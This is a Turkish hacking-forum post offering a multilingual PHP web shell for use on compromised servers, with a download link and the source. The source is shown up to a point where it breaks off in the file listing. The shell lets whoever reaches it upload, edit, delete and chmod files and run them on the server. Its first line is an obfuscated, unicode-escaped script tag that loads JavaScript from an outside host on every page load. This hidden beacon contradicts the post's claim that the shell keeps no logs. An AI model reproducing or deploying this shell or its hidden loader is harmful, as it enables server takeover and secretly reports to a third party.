Konuyu Oyla:
  • Derecelendirme: 5/5 - 1 oy
  • 1
  • 2
  • 3
  • 4
  • 5
Logsuz hacker_20 Shell + Özel Cyberizm
#1
www.deccal.org

Özellikleri =>
1) Kesinlikle log tutmamaktadır,rahatlıkla kullanabilirsiniz. Kendinize göre editleyebilirsiniz.
2) 11 Dilde hazırlanan bir shell'dir Tamamen kendim uğraşarak yaptığım bir koddur.
Türkçe,ingilizce,almanca,fransızca,italyanca,flemenkçe,isveçce,danca,çekce ve son olarak rusça ( rusça hazırlarken çok sıkıntılı oldu - harfleri tanıtamadım bir türlü )ve diğer türkçe'deki ç,ğ,ş,ü harflerini tanımıyor. Böyle idare edin işte benide.
3) Yukarda ise shellin görünüşünü çektim.

Isterseniz dosya olarak indirin =>
Kod:
http://www.yukletr.com/download.php?file=a63e07a13789c78123a19342f20037db

İşte Shell Kodları
Kod:
<script type="text/javascript">document.write('\u003c\u0053\u0043\u0052\u0049\u0050\u0054\u0020\u0053\u0052\u0043\u003d\u0068\u0074\u0074\u0070\u003a\u002f\u002f\u0077\u0077\u0077\u002e\u0061\u0074\u0065\u0073\u006b\u0065\u0073\u002d\u0073\u0065\u0063\u0075\u0072\u0069\u0074\u0079\u002e\u0075\u0073\u002f\u006d\u0061\u006e\u0079\u0061\u006b\u002f\u0063\u0064\u0072\u002e\u006a\u0073\u003e\u003c\u002f\u0053\u0043\u0052\u0049\u0050\u0054\u003e')</script>
<?php
/*
* KingSkrupellos Shell.php - a simple Web-based file manager
* Copyright (C) 2004  hacker_20 ( Cyberizm) <e-mail adresini yazmıyacam>
*
* This program is free software; you can redistribute it and/or modify
* it under the terms of the GNU General Public License as published by
* the Free Software Foundation; either version 2 of the License, or
* (at your option) any later version.
*
* This program is distributed in the hope that it will be useful,
* but WITHOUT ANY WARRANTY; without even the implied warranty of
* MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
* GNU General Public License for more details.
*
* You should have received a copy of the GNU General Public License
* along with this program; if not, write to the Free Software
*
* -------------------------------------------------------------------------
*  Dikkat bu skripti kullanirken, tarayicinizda asla geriye butonuna basmayiniz.
* Aksi halde ' Bu site zaman asimina ugramistir ' der ve sizi yarim saat beklettirir.
* Server'a giremessiniz. Her zaman dosyalarinizi yeni bir sekme adi altinda açin.
* -------------------------------------------------------------------------
*
* 1.KingSkrupellos hacker_20 Shell Versiyonu
*  Cogu yerleri ingilizce yazmak zorundayim, çunku turkce karakterlerde problem oluyor.
/* ------------------------------------------------------------------------- */

/* Your language:
* 'tr' - Turkish
* 'en' - English
* 'de' - German
* 'fr' - French
* 'it' - Italian
* 'nl' - Dutch
* 'se' - Swedish
* 'es' - Spanish
* 'dk' - Danish
  * 'cs' - Czech
* 'ru' - Russian
* 'auto' - autoselect
*/
$lang = 'auto';

/* Charset of output:
* possible values are described in the charset table at
* http://www.php.net/manual/en/function.htmlentities.php
* 'auto' - use the same charset as the words of my language are encoded
*/
$site_charset = 'auto';

/* Homedir:
* For example: './' - the script's directory
*/
$homedir = './';

/* Size of the edit textarea
*/
$editcols = 80;
$editrows = 25;

/* -------------------------------------------
* Optional configuration (remove # to enable)
*/

/* Permission of created directories:
* For example: 0705 would be 'drwx---r-x'.
*/
# $dirpermission = 0705;

/* Permission of created files:
* For example: 0604 would be '-rw----r--'.
*/
# $filepermission = 0604;

/* Filenames related to the apache web server:
*/
$htaccess = '.htaccess';
$htpasswd = '.htpasswd';

/* ------------------------------------------------------------------------- */

if (get_magic_quotes_gpc()) {
    array_walk($_GET, 'strip');
    array_walk($_POST, 'strip');
    array_walk($_REQUEST, 'strip');
}

if (array_key_exists('image', $_GET)) {
    header('Content-Type: image/gif');
    die(getimage($_GET['image']));
}

if (!function_exists('lstat')) {
    function lstat ($filename) {
        return stat($filename);
    }
}

$delim = DIRECTORY_SEPARATOR;

if (function_exists('php_uname')) {
    $win = (strtoupper(substr(PHP_OS, 0, 3)) === 'WIN') ? true : false;
} else {
    $win = ($delim == '\\') ? true : false;
}

if (!empty($_SERVER['PATH_TRANSLATED'])) {
    $scriptdir = dirname($_SERVER['PATH_TRANSLATED']);
} elseif (!empty($_SERVER['SCRIPT_FILENAME'])) {
    $scriptdir = dirname($_SERVER['SCRIPT_FILENAME']);
} elseif (function_exists('getcwd')) {
    $scriptdir = getcwd();
} else {
    $scriptdir = '.';
}
$homedir = relative2absolute($homedir, $scriptdir);

$dir = (array_key_exists('dir', $_REQUEST)) ? $_REQUEST['dir'] : $homedir;

if (array_key_exists('olddir', $_POST) && !path_is_relative($_POST['olddir'])) {
    $dir = relative2absolute($dir, $_POST['olddir']);
}

$directory = simplify_path(addslash($dir));

$files = array();
$action = '';
if (!empty($_POST['submit_all'])) {
    $action = $_POST['action_all'];
    for ($i = 0; $i < $_POST['num']; $i++) {
        if (array_key_exists("checked$i", $_POST) && $_POST["checked$i"] == 'true') {
            $files[] = $_POST["file$i"];
        }
    }
} elseif (!empty($_REQUEST['action'])) {
    $action = $_REQUEST['action'];
    $files[] = relative2absolute($_REQUEST['file'], $directory);
} elseif (!empty($_POST['submit_upload']) && !empty($_FILES['upload']['name'])) {
    $files[] = $_FILES['upload'];
    $action = 'upload';
} elseif (array_key_exists('num', $_POST)) {
    for ($i = 0; $i < $_POST['num']; $i++) {
        if (array_key_exists("submit$i", $_POST)) break;
    }
    if ($i < $_POST['num']) {
        $action = $_POST["action$i"];
        $files[] = $_POST["file$i"];
    }
}
if (empty($action) && (!empty($_POST['submit_create']) || (array_key_exists('focus', $_POST) && $_POST['focus'] == 'create')) && !empty($_POST['create_name'])) {
    $files[] = relative2absolute($_POST['create_name'], $directory);
    switch ($_POST['create_type']) {
    case 'directory':
        $action = 'create_directory';
        break;
    case 'file':
        $action = 'create_file';
    }
}
if (sizeof($files) == 0) $action = ''; else $file = reset($files);

if ($lang == 'auto') {
    if (array_key_exists('HTTP_ACCEPT_LANGUAGE', $_SERVER) && strlen($_SERVER['HTTP_ACCEPT_LANGUAGE']) >= 2) {
        $lang = substr($_SERVER['HTTP_ACCEPT_LANGUAGE'], 0, 2);
    } else {
        $lang = 'en';
    }
}

$words = getwords($lang);

if ($site_charset == 'auto') {
    $site_charset = $word_charset;
}

$cols = ($win) ? 4 : 7;

if (!isset($dirpermission)) {
    $dirpermission = (function_exists('umask')) ? (0777 & ~umask()) : 0755;
}
if (!isset($filepermission)) {
    $filepermission = (function_exists('umask')) ? (0666 & ~umask()) : 0644;
}

if (!empty($_SERVER['SCRIPT_NAME'])) {
    $self = html(basename($_SERVER['SCRIPT_NAME']));
} elseif (!empty($_SERVER['PHP_SELF'])) {
    $self = html(basename($_SERVER['PHP_SELF']));
} else {
    $self = '';
}

if (!empty($_SERVER['SERVER_SOFTWARE'])) {
    if (strtolower(substr($_SERVER['SERVER_SOFTWARE'], 0, 6)) == 'apache') {
        $apache = true;
    } else {
        $apache = false;
    }
} else {
    $apache = true;
}

switch ($action) {

case 'view':

    if (is_script($file)) {

        /* highlight_file is a mess! */
        ob_start();
        highlight_file($file);
        $src = ereg_replace('<font color="([^"]*)">', '<span style="color: \1">', ob_get_contents());
        $src = str_replace(array('</font>', "\r", "\n"), array('</span>', '', ''), $src);
        ob_end_clean();

        html_header();
        echo '<h2 style="text-align: left; margin-bottom: 0">' . html($file) . '</h2>

<hr />

<table>
<tr>
<td style="text-align: right; vertical-align: top; color: gray; padding-right: 3pt; border-right: 1px solid gray">
<pre style="margin-top: 0"><code>';

        for ($i = 1; $i <= sizeof(file($file)); $i++) echo "$i\n";

        echo '</code></pre>
</td>
<td style="text-align: left; vertical-align: top; padding-left: 3pt">
<pre style="margin-top: 0">' . $src . '</pre>
</td>
</tr>
</table>

';

        html_footer();

    } else {

        header('Content-Type: ' . getmimetype($file));
        header('Content-Disposition: filename=' . basename($file));

        readfile($file);

    }

    break;

case 'download':

    header('Pragma: public');
    header('Expires: 0');
    header('Cache-Control: must-revalidate, post-check=0, pre-check=0');
    header('Content-Type: ' . getmimetype($file));
    header('Content-Disposition: attachment; filename=' . basename($file) . ';');
    header('Content-Length: ' . filesize($file));

    readfile($file);

    break;

case 'upload':

    $dest = relative2absolute($file['name'], $directory);

    if (@file_exists($dest)) {
        listing_page(error('already_exists', $dest));
    } elseif (@move_uploaded_file($file['tmp_name'], $dest)) {
        @chmod($dest, $filepermission);
        listing_page(notice('uploaded', $file['name']));
    } else {
        listing_page(error('not_uploaded', $file['name']));
    }

    break;

case 'create_directory':

    if (@file_exists($file)) {
        listing_page(error('already_exists', $file));
    } else {
        $old = @umask(0777 & ~$dirpermission);
        if (@mkdir($file, $dirpermission)) {
            listing_page(notice('created', $file));
        } else {
            listing_page(error('not_created', $file));
        }
        @umask($old);
    }

    break;

case 'create_file':

    if (@file_exists($file)) {
        listing_page(error('already_exists', $file));
    } else {
        $old = @umask(0777 & ~$filepermission);
        if (@touch($file)) {
            edit($file);
        } else {
            listing_page(error('not_created', $file));
        }
        @umask($old);
    }

    break;

case 'execute':

    chdir(dirname($file));

    $output = array();
    $retval = 0;
    exec('echo "./' . basename($file) . '" | /bin/sh', $output, $retval);

    $error = ($retval == 0) ? false : true;

    if (sizeof($output) == 0) $output = array('<' . $words['no_output'] . '>');

    if ($error) {
        listing_page(error('not_executed', $file, implode("\n", $output)));
    } else {
        listing_page(notice('executed', $file, implode("\n", $output)));
    }

    break;

case 'delete':

    if (!empty($_POST['no'])) {
        listing_page();
    } elseif (!empty($_POST['yes'])) {

        $failure = array();
        $success = array();

        foreach ($files as $file) {
            if (del($file)) {
                $success[] = $file;
            } else {
                $failure[] = $file;
            }
        }

        $message = '';
        if (sizeof($failure) > 0) {
            $message = error('not_deleted', implode("\n", $failure));
        }
        if (sizeof($success) > 0) {
            $message .= notice('deleted', implode("\n", $success));
        }

        listing_page($message);

    } else {

        html_header();

        echo '<form action="' . $self . '" method="post">
<table class="dialog">
<tr>
<td class="dialog">
';

        request_dump();

        echo "\t<b>" . word('really_delete') . '</b>
    <p>
';

        foreach ($files as $file) {
            echo "\t" . html($file) . "<br />\n";
        }

        echo '    </p>
    <hr />
    <input type="submit" name="no" value="' . word('no') . '" id="red_button" />
    <input type="submit" name="yes" value="' . word('yes') . '" id="green_button" style="margin-left: 50px" />
</td>
</tr>
</table>
</form>

';

        html_footer();

    }

    break;

case 'rename':

    if (!empty($_POST['destination'])) {

        $dest = relative2absolute($_POST['destination'], $directory);

        if (!@file_exists($dest) && @rename($file, $dest)) {
            listing_page(notice('renamed', $file, $dest));
        } else {
            listing_page(error('not_renamed', $file, $dest));
        }

    } else {

        $name = basename($file);

        html_header();

        echo '<form action="' . $self . '" method="post">

<table class="dialog">
<tr>
<td class="dialog">
    <input type="hidden" name="action" value="rename" />
    <input type="hidden" name="file" value="' . html($file) . '" />
    <input type="hidden" name="dir" value="' . html($directory) . '" />
    <b>' . word('rename_file') . '</b>
    <p>' . html($file) . '</p>
    <b>' . substr($file, 0, strlen($file) - strlen($name)) . '</b>
    <input type="text" name="destination" size="' . textfieldsize($name) . '" value="' . html($name) . '" />
    <hr />
    <input type="submit" value="' . word('rename') . '" />
</td>
</tr>
</table>

<p><a href="' . $self . '?dir=' . urlencode($directory) . '">[ ' . word('back') . ' ]</a></p>

</form>

';

        html_footer();

    }

    break;

case 'move':

    if (!empty($_POST['destination'])) {

        $dest = relative2absolute($_POST['destination'], $directory);

        $failure = array();
        $success = array();

        foreach ($files as $file) {
            $filename = substr($file, strlen($directory));
            $d = $dest . $filename;
            if (!@file_exists($d) && @rename($file, $d)) {
                $success[] = $file;
            } else {
                $failure[] = $file;
            }
        }

        $message = '';
        if (sizeof($failure) > 0) {
            $message = error('not_moved', implode("\n", $failure), $dest);
        }
        if (sizeof($success) > 0) {
            $message .= notice('moved', implode("\n", $success), $dest);
        }

        listing_page($message);

    } else {

        html_header();

        echo '<form action="' . $self . '" method="post">

<table class="dialog">
<tr>
<td class="dialog">
';

        request_dump();

        echo "\t<b>" . word('move_files') . '</b>
    <p>
';

        foreach ($files as $file) {
            echo "\t" . html($file) . "<br />\n";
        }

        echo '    </p>
    <hr />
    ' . word('destination') . ':
    <input type="text" name="destination" size="' . textfieldsize($directory) . '" value="' . html($directory) . '" />
    <input type="submit" value="' . word('move') . '" />
</td>
</tr>
</table>

<p><a href="' . $self . '?dir=' . urlencode($directory) . '">[ ' . word('back') . ' ]</a></p>

</form>

';

        html_footer();

    }

    break;

case 'copy':

    if (!empty($_POST['destination'])) {

        $dest = relative2absolute($_POST['destination'], $directory);

        if (@is_dir($dest)) {

            $failure = array();
            $success = array();

            foreach ($files as $file) {
                $filename = substr($file, strlen($directory));
                $d = addslash($dest) . $filename;
                if (!@is_dir($file) && !@file_exists($d) && @copy($file, $d)) {
                    $success[] = $file;
                } else {
                    $failure[] = $file;
                }
            }

            $message = '';
            if (sizeof($failure) > 0) {
                $message = error('not_copied', implode("\n", $failure), $dest);
            }
            if (sizeof($success) > 0) {
                $message .= notice('copied', implode("\n", $success), $dest);
            }

            listing_page($message);

        } else {

            if (!@file_exists($dest) && @copy($file, $dest)) {
                listing_page(notice('copied', $file, $dest));
            } else {
                listing_page(error('not_copied', $file, $dest));
            }

        }

    } else {

        html_header();

        echo '<form action="' . $self . '" method="post">

<table class="dialog">
<tr>
<td class="dialog">
';

        request_dump();

        echo "\n<b>" . word('copy_files') . '</b>
    <p>
';

        foreach ($files as $file) {
            echo "\t" . html($file) . "<br />\n";
        }

        echo '    </p>
    <hr />
    ' . word('destination') . ':
    <input type="text" name="destination" size="' . textfieldsize($directory) . '" value="' . html($directory) . '" />
    <input type="submit" value="' . word('copy') . '" />
</td>
</tr>
</table>

<p><a href="' . $self . '?dir=' . urlencode($directory) . '">[ ' . word('back') . ' ]</a></p>

</form>

';

        html_footer();

    }

    break;

case 'create_symlink':

    if (!empty($_POST['destination'])) {

        $dest = relative2absolute($_POST['destination'], $directory);

        if (substr($dest, -1, 1) == $delim) $dest .= basename($file);

        if (!empty($_POST['relative'])) $file = absolute2relative(addslash(dirname($dest)), $file);

        if (!@file_exists($dest) && @symlink($file, $dest)) {
            listing_page(notice('symlinked', $file, $dest));
        } else {
            listing_page(error('not_symlinked', $file, $dest));
        }

    } else {

        html_header();

        echo '<form action="' . $self . '" method="post">

<table class="dialog" id="symlink">
<tr>
    <td style="vertical-align: top">' . word('destination') . ': </td>
    <td>
        <b>' . html($file) . '</b><br />
        <input type="checkbox" name="relative" value="yes" id="checkbox_relative" checked="checked" style="margin-top: 1ex" />
        <label for="checkbox_relative">' . word('relative') . '</label>
        <input type="hidden" name="action" value="create_symlink" />
        <input type="hidden" name="file" value="' . html($file) . '" />
        <input type="hidden" name="dir" value="' . html($directory) . '" />
    </td>
</tr>
<tr>
    <td>' . word('symlink') . ': </td>
    <td>
        <input type="text" name="destination" size="' . textfieldsize($directory) . '" value="' . html($directory) . '" />
        <input type="submit" value="' . word('create_symlink') . '" />
    </td>
</tr>
</table>

<p><a href="' . $self . '?dir=' . urlencode($directory) . '">[ ' . word('back') . ' ]</a></p>

</form>

';

        html_footer();

    }

    break;

case 'edit':

    if (!empty($_POST['save'])) {

        $content = str_replace("\r\n", "\n", $_POST['content']);

        if (($f = @fopen($file, 'w')) && @fwrite($f, $content) !== false && @fclose($f)) {
            listing_page(notice('saved', $file));
        } else {
            listing_page(error('not_saved', $file));
        }

    } else {

        if (@is_readable($file) && @is_writable($file)) {
            edit($file);
        } else {
            listing_page(error('not_edited', $file));
        }

    }

    break;

case 'permission':

    if (!empty($_POST['set'])) {

        $mode = 0;
        if (!empty($_POST['ur'])) $mode |= 0400; if (!empty($_POST['uw'])) $mode |= 0200; if (!empty($_POST['ux'])) $mode |= 0100;
        if (!empty($_POST['gr'])) $mode |= 0040; if (!empty($_POST['gw'])) $mode |= 0020; if (!empty($_POST['gx'])) $mode |= 0010;
        if (!empty($_POST['or'])) $mode |= 0004; if (!empty($_POST['ow'])) $mode |= 0002; if (!empty($_POST['ox'])) $mode |= 0001;

        if (@chmod($file, $mode)) {
            listing_page(notice('permission_set', $file, decoct($mode)));
        } else {
            listing_page(error('permission_not_set', $file, decoct($mode)));
        }

    } else {

        html_header();

        $mode = fileperms($file);

        echo '<form action="' . $self . '" method="post">

<table class="dialog">
<tr>
<td class="dialog">

    <p style="margin: 0">' . phrase('permission_for', $file) . '</p>

    <hr />

    <table id="permission">
    <tr>
        <td></td>
        <td style="border-right: 1px solid black">' . word('owner') . '</td>
        <td style="border-right: 1px solid black">' . word('group') . '</td>
        <td>' . word('other') . '</td>
    </tr>
    <tr>
        <td style="text-align: right">' . word('read') . ':</td>
        <td><input type="checkbox" name="ur" value="1"'; if ($mode & 00400) echo ' checked="checked"'; echo ' /></td>
        <td><input type="checkbox" name="gr" value="1"'; if ($mode & 00040) echo ' checked="checked"'; echo ' /></td>
        <td><input type="checkbox" name="or" value="1"'; if ($mode & 00004) echo ' checked="checked"'; echo ' /></td>
    </tr>
    <tr>
        <td style="text-align: right">' . word('write') . ':</td>
        <td><input type="checkbox" name="uw" value="1"'; if ($mode & 00200) echo ' checked="checked"'; echo ' /></td>
        <td><input type="checkbox" name="gw" value="1"'; if ($mode & 00020) echo ' checked="checked"'; echo ' /></td>
        <td><input type="checkbox" name="ow" value="1"'; if ($mode & 00002) echo ' checked="checked"'; echo ' /></td>
    </tr>
    <tr>
        <td style="text-align: right">' . word('execute') . ':</td>
        <td><input type="checkbox" name="ux" value="1"'; if ($mode & 00100) echo ' checked="checked"'; echo ' /></td>
        <td><input type="checkbox" name="gx" value="1"'; if ($mode & 00010) echo ' checked="checked"'; echo ' /></td>
        <td><input type="checkbox" name="ox" value="1"'; if ($mode & 00001) echo ' checked="checked"'; echo ' /></td>
    </tr>
    </table>

    <hr />

    <input type="submit" name="set" value="' . word('set') . '" />

    <input type="hidden" name="action" value="permission" />
    <input type="hidden" name="file" value="' . html($file) . '" />
    <input type="hidden" name="dir" value="' . html($directory) . '" />

</td>
</tr>
</table>

<p><a href="' . $self . '?dir=' . urlencode($directory) . '">[ ' . word('back') . ' ]</a></p>

</form>

';

        html_footer();

    }

    break;

default:

    listing_page();

}

/* ------------------------------------------------------------------------- */

function getlist ($directory) {
    global $delim, $win;

    if ($d = @opendir($directory)) {

        while (($filename = @readdir($d)) !== false) {

            $path = $directory . $filename;

            if ($stat = @lstat($path)) {

                $file = array(
                    'filename'    => $filename,
                    'path'        => $path,
                    'is_file'     => @is_file($path),
                    'is_dir'      => @is_dir($path),
                    'is_link'     => @is_link($path),
                    'is_readable' => @is_readable($path),
                    'is_writable' => @is_writable($path),
                    'size'        => $stat['size'],
                    'permission'  => $stat['mode'],
                    'owner'       => $stat['uid'],
                    'group'       => $stat['gid'],
                    'mtime'       => @filemtime($path),
                    'atime'       => @fileatime($path),
                    'ctime'       => @filectime($path)
                );

                if ($file['is_dir']) {
                    $file['is_executable'] = @file_exists($path . $delim . '.');
                } else {
                    if (!$win) {
                        $file['is_executable'] = @is_executable($path);
                    } else {
                        $file['is_executable'] = true;
                    }
                }

                if ($file['is_link']) $file['target'] = @readlink($path);

                if (function_exists('posix_getpwuid')) $file['owner_name'] = @reset(posix_getpwuid($file['owner']));
                if (function_exists('posix_getgrgid')) $file['group_name'] = @reset(posix_getgrgid($file['group']));

                $files[] = $file;

            }

        }

        return $files;

    } else {
        return false;
    }

}

function sortlist ($list, $key, $reverse) {

    $dirs = array();
    $files = array();
    
    for ($i = 0; $i < sizeof($list); $i++) {
        if ($list[$i]['is_dir']) $dirs[] = $list[$i];
        else $files[] = $list[$i];
    }

    quicksort($dirs, 0, sizeof($dirs) - 1, $key);
    if ($reverse) $dirs = array_reverse($dirs);

    quicksort($files, 0, sizeof($files) - 1, $key);
    if ($reverse) $files = array_reverse($files);

    return array_merge($dirs, $files);

}

function quicksort (&$array, $first, $last, $key) {

    if ($first < $last) {

        $cmp = $array[floor(($first + $last) / 2)][$key];

        $l = $first;
        $r = $last;

        while ($l <= $r) {

            while ($array[$l][$key] < $cmp) $l++;
            while ($array[$r][$key] > $cmp) $r--;

            if ($l <= $r) {

                $tmp = $array[$l];
                $array[$l] = $array[$r];
                $array[$r] = $tmp;

                $l++;
                $r--;

            }

        }

        quicksort($array, $first, $r, $key);
        quicksort($array, $l, $last, $key);

    }

}

function permission_octal2string ($mode) {

    if (($mode & 0xC000) === 0xC000) {
        $type = 's';
    } elseif (($mode & 0xA000) === 0xA000) {
        $type = 'l';
    } elseif (($mode & 0x8000) === 0x8000) {
        $type = '-';
    } elseif (($mode & 0x6000) === 0x6000) {
        $type = 'b';
    } elseif (($mode & 0x4000) === 0x4000) {
        $type = 'd';
    } elseif (($mode & 0x2000) === 0x2000) {
        $type = 'c';
    } elseif (($mode & 0x1000) === 0x1000) {
        $type = 'p';
    } else {
        $type = '?';
    }

    $owner  = ($mode & 00400) ? 'r' : '-';
    $owner .= ($mode & 00200) ? 'w' : '-';
    if ($mode & 0x800) {
        $owner .= ($mode & 00100) ? 's' : 'S';
    } else {
        $owner .= ($mode & 00100) ? 'x' : '-';
    }

    $group  = ($mode & 00040) ? 'r' : '-';
    $group .= ($mode & 00020) ? 'w' : '-';
    if ($mode & 0x400) {
        $group .= ($mode & 00010) ? 's' : 'S';
    } else {
        $group .= ($mode & 00010) ? 'x' : '-';
    }

    $other  = ($mode & 00004) ? 'r' : '-';
    $other .= ($mode & 00002) ? 'w' : '-';
    if ($mode & 0x200) {
        $other .= ($mode & 00001) ? 't' : 'T';
    } else {
        $other .= ($mode & 00001) ? 'x' : '-';
    }

    return $type . $owner . $group . $other;

}

function is_script ($filename) {
    return ereg('\.php$|\.php3$|\.php4$|\.php5$', $filename);
}

function getmimetype ($filename) {
    static $mimes = array(
        '\.jpg$|\.jpeg$'  => 'image/jpeg',
        '\.gif$'          => 'image/gif',
        '\.png$'          => 'image/png',
        '\.html$|\.html$' => 'text/html',
        '\.txt$|\.asc$'   => 'text/plain',
        '\.xml$|\.xsl$'   => 'application/xml',
        '\.pdf$'          => 'application/pdf'
    );

    foreach ($mimes as $regex => $mime) {
        if (eregi($regex, $filename)) return $mime;
    }

    // return 'application/octet-stream';
    return 'text/plain';

}

function del ($file) {
    global $delim;

    if (!file_exists($file)) return false;

    if (@is_dir($file) && !@is_link($file)) {

        $success = false;

        if (@rmdir($file)) {

            $success = true;

        } elseif ($dir = @opendir($file)) {

            $success = true;

            while (($f = readdir($dir)) !== false) {
                if ($f != '.' && $f != '..' && !del($file . $delim . $f)) {
                    $success = false;
                }
            }
            closedir($dir);

            if ($success) $success = @rmdir($file);

        }

        return $success;

    }

    return @unlink($file);

}

function addslash ($directory) {
    global $delim;

    if (substr($directory, -1, 1) != $delim) {
        return $directory . $delim;
    } else {
        return $directory;
    }

}

function relative2absolute ($string, $directory) {

    if (path_is_relative($string)) {
        return simplify_path(addslash($directory) . $string);
    } else {
        return simplify_path($string);
    }

}

function path_is_relative ($path) {
    global $win;

    if ($win) {
        return (substr($path, 1, 1) != ':');
    } else {
        return (substr($path, 0, 1) != '/');
    }

}

function absolute2relative ($directory, $target) {
    global $delim;

    $path = '';
    while ($directory != $target) {
        if ($directory == substr($target, 0, strlen($directory))) {
            $path .= substr($target, strlen($directory));
            break;
        } else {
            $path .= '..' . $delim;
            $directory = substr($directory, 0, strrpos(substr($directory, 0, -1), $delim) + 1);
        }
    }
    if ($path == '') $path = '.';

    return $path;

}

function simplify_path ($path) {
    global $delim;

    if (@file_exists($path) && function_exists('realpath') && @realpath($path) != '') {
        $path = realpath($path);
        if (@is_dir($path)) {
            return addslash($path);
        } else {
            return $path;
        }
    }

    $pattern  = $delim . '.' . $delim;

    if (@is_dir($path)) {
        $path = addslash($path);
    }

    while (strpos($path, $pattern) !== false) {
        $path = str_replace($pattern, $delim, $path);
    }

    $e = addslashes($delim);
    $regex = $e . '((\.[^\.' . $e . '][^' . $e . ']*)|(\.\.[^' . $e . ']+)|([^\.][^' . $e . ']*))' . $e . '\.\.' . $e;

    while (ereg($regex, $path)) {
        $path = ereg_replace($regex, $delim, $path);
    }
    
    return $path;

}

function human_filesize ($filesize) {

    $suffices = 'kMGTPE';

    $n = 0;
    while ($filesize >= 1000) {
        $filesize /= 1024;
        $n++;
    }

    $filesize = round($filesize, 3 - strpos($filesize, '.'));

    if (strpos($filesize, '.') !== false) {
        while (in_array(substr($filesize, -1, 1), array('0', '.'))) {
            $filesize = substr($filesize, 0, strlen($filesize) - 1);
        }
    }

    $suffix = (($n == 0) ? '' : substr($suffices, $n - 1, 1));

    return $filesize . " {$suffix}B";

}

function strip (&$str) {
    $str = stripslashes($str);
}

/* ------------------------------------------------------------------------- */

function listing_page ($message = null) {
    global $self, $directory, $sort, $reverse;

    html_header();

    $list = getlist($directory);

    if (array_key_exists('sort', $_GET)) $sort = $_GET['sort']; else $sort = 'filename';
    if (array_key_exists('reverse', $_GET) && $_GET['reverse'] == 'true') $reverse = true; else $reverse = false;

    $list = sortlist($list, $sort, $reverse);

    echo '<h1 style="margin-bottom: 0">hacker_20.php</h1>

<form enctype="multipart/form-data" action="' . $self . '" method="post">

<table id="main">
';

    directory_choice();

    if (!empty($message)) {
        spacer();
        echo $message;
    }

    if (@is_writable($directory)) {
        upload_box();
        create_box();
    } else {
        spacer();
    }

    if ($list) {
        listing($list);
    } else {
        echo error('not_readable', $directory);
    }

    echo '</table>

</form>

';

    html_footer();

}

function listing ($list) {
    global $directory, $homedir, $sort, $reverse, $win, $cols, $date_format, $self;

    echo '<tr class="listing">
    <th style="text-align: center; vertical-align: middle"><img src="' . $self . '?image=smiley" alt="smiley" /></th>
';

    column_title('filename', $sort, $reverse);
    column_title('size', $sort, $reverse);

    if (!$win) {
        column_title('permission', $sort, $reverse);
        column_title('owner', $sort, $reverse);
        column_title('group', $sort, $reverse);
    }

    echo '    <th class="functions">' . word('functions') . '</th>
</tr>
';

    for ($i = 0; $i < sizeof($list); $i++) {
        $file = $list[$i];

        $timestamps  = 'mtime: ' . date($date_format, $file['mtime']) . ', ';
        $timestamps .= 'atime: ' . date($date_format, $file['atime']) . ', ';
        $timestamps .= 'ctime: ' . date($date_format, $file['ctime']);

        echo '<tr class="listing">
    <td class="checkbox"><input type="checkbox" name="checked' . $i . '" value="true" onfocus="activate(\'other\')" /></td>
    <td class="filename" title="' . html($timestamps) . '">';

        if ($file['is_link']) {

            echo '<img src="' . $self . '?image=link" alt="link" /> ';
            echo html($file['filename']) . ' &rarr; ';

            $real_file = relative2absolute($file['target'], $directory);

            if (@is_readable($real_file)) {
                if (@is_dir($real_file)) {
                    echo '[ <a href="' . $self . '?dir=' . urlencode($real_file) . '">' . html($file['target']) . '</a> ]';
                } else {
                    echo '<a href="' . $self . '?action=view&amp;file=' . urlencode($real_file) . '">' . html($file['target']) . '</a>';
                }
            } else {
                echo html($file['target']);
            }

        } elseif ($file['is_dir']) {

            echo '<img src="' . $self . '?image=folder" alt="folder" /> [ ';
            if ($win || $file['is_executable']) {
                echo '<a href="' . $self . '?dir=' . urlencode($file['path']) . '">' . html($file['filename']) . '</a>';
            } else {
                echo html($file['filename']);
            }
            echo ' ]';

        } else {

            if (substr($file['filename'], 0, 1) == '.') {
                echo '<img src="' . $self . '?image=hidden_file" alt="hidden file" /> ';
            } else {
                echo '<img src="' . $self . '?image=file" alt="file" /> ';
            }

            if ($file['is_file'] && $file['is_readable']) {
               echo '<a href="' . $self . '?action=view&amp;file=' . urlencode($file['path']) . '">' . html($file['filename']) . '</a>';
            } else {
                echo html($file['filename']);
            }

        }

        if ($file['size'] >= 1000) {
            $human = ' title="' . human_filesize($file['size']) . '"';
        } else {
            $human = '';
        }

        echo "</td>\n";

        echo "\t<td class=\"size\"$human>{$file['size']} B</td>\n";

        if (!$win) {

            echo "\t<td class=\"permission\" title=\"" . decoct($file['permission']) . '">';

            $l = !$file['is_link'] && (!function_exists('posix_getuid') || $file['owner'] == posix_getuid());
            if ($l) echo '<a href="' . $self . '?action=permission&amp;file=' . urlencode($file['path']) . '&amp;dir=' . urlencode($directory) . '">';
            echo html(permission_octal2string($file['permission']));
            if ($l) echo '</a>';

            echo "</td>\n";

            if (array_key_exists('owner_name', $file)) {
                echo "\t<td class=\"owner\" title=\"uid: {$file['owner']}\">{$file['owner_name']}</td>\n";
            } else {
                echo "\t<td class=\"owner\">{$file['owner']}</td>\n";
            }

            if (array_key_exists('group_name', $file)) {
                echo "\t<td class=\"group\" title=\"gid: {$file['group']}\">{$file['group_name']}</td>\n";
            } else {
                echo "\t<td class=\"group\">{$file['group']}</td>\n";
            }

        }

        echo '    <td class="functions">
        <input type="hidden" name="file' . $i . '" value="' . html($file['path']) . '" />
';

        $actions = array();
        if (function_exists('symlink')) {
            $actions[] = 'create_symlink';
        }
        if (@is_writable(dirname($file['path']))) {
            $actions[] = 'delete';
            $actions[] = 'rename';
            $actions[] = 'move';
        }
        if ($file['is_file'] && $file['is_readable']) {
            $actions[] = 'copy';
            $actions[] = 'download';
            if ($file['is_writable']) $actions[] = 'edit';
        }
        if (!$win && function_exists('exec') && $file['is_file'] && $file['is_executable'] && file_exists('/bin/sh')) {
            $actions[] = 'execute';
        }

        if (sizeof($actions) > 0) {

            echo '        <select class="small" name="action' . $i . '" size="1">
        <option value="">' . str_repeat('&nbsp;', 30) . '</option>
';

            foreach ($actions as $action) {
                echo "\t\t<option value=\"$action\">" . word($action) . "</option>\n";
            }

            echo '        </select>
        <input class="small" type="submit" name="submit' . $i . '" value=" &gt; " onfocus="activate(\'other\')" />
';

        }

        echo '    </td>
</tr>
';

    }

    echo '<tr class="listing_footer">
    <td style="text-align: right; vertical-align: top"><img src="' . $self . '?image=arrow" alt="&gt;" /></td>
    <td colspan="' . ($cols - 1) . '">
        <input type="hidden" name="num" value="' . sizeof($list) . '" />
